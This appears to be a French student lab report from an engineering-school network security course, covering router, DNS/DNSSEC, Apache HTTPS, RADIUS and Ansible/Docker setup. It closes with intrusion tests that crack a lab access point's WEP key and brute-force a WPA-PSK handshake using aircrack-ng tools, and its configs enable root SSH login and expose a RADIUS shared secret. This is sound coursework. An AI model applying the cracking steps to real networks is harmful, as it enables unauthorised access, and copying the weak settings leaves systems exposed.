       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier '''etc/ssh/sshd_config''' de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps: &lt;br /&gt;
 root@mycoplasma:/ apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut modifier les fichiers de configuration: &lt;br /&gt;
* clients.conf &lt;br /&gt;
 root@mycoplasma:/etc/freeradius/3.0 # vi clients.conf &lt;br /&gt;
  client 10.60.200.2/24 {&lt;br /&gt;
   secret = secretIMA5SC&lt;br /&gt;
   shortname = borneMycoplasma&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
  client PA {&lt;br /&gt;
   ipaddr = 10.60.201.5&lt;br /&gt;
   secret = secretIMA5SC&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
* users &lt;br /&gt;
Il faut ajouter une ligne qui indique l'identifiant et le mot de passe. On a choisi les mêmes id que la VM : root et mot de passe habituel.&lt;br /&gt;
 root@mycoplasma:/etc/freeradius/3.0# vim users&lt;br /&gt;
&lt;br /&gt;
 user Cleartext-Password := &amp;quot;&amp;lt;password&amp;gt;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Enregistrer les modifications et relancer :&lt;br /&gt;
 service freeradius stop&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible. Nous avons préparé le palybook suivant pour le déploiement de notre ferme de serveurs.&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# cat deploy-site.yaml''' &lt;br /&gt;
 ---&lt;br /&gt;
 - hosts: webservers&lt;br /&gt;
   tasks: &lt;br /&gt;
    - name: 1. Copying Website files&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/index.html&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/index.html&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 2. Copying Dockerfile&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/Dockerfile&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/Dockerfile&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 3. Install pip&lt;br /&gt;
      apt: name=python-pip state=present&lt;br /&gt;
    - name: 4. install docker package&lt;br /&gt;
      pip: name=docker&lt;br /&gt;
    - name: 5. Stop container if running&lt;br /&gt;
      docker_container:&lt;br /&gt;
       name: mycoplasmacontainer&lt;br /&gt;
       state: stopped&lt;br /&gt;
    - name: 6. delete image&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        force: yes&lt;br /&gt;
        state: absent&lt;br /&gt;
    - name: 7. Build Docker image from Dockerfile&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        path: &amp;quot;/tmp/docker/mycoplasma/&amp;quot;&lt;br /&gt;
        state: build&lt;br /&gt;
    - name: 8. Running the container&lt;br /&gt;
      docker_container:&lt;br /&gt;
        image: mycoplasma:latest&lt;br /&gt;
        state: started&lt;br /&gt;
        recreate: yes&lt;br /&gt;
        name: mycoplasmacontainer&lt;br /&gt;
        ports: &amp;quot;8002:80&amp;quot;&lt;br /&gt;
    - name: 9. Check if container is running&lt;br /&gt;
      shell: docker ps&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# ansible-playbook deploy-site.yaml'''&lt;br /&gt;
&lt;br /&gt;
[[Fichier:load_balancers.png]]&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
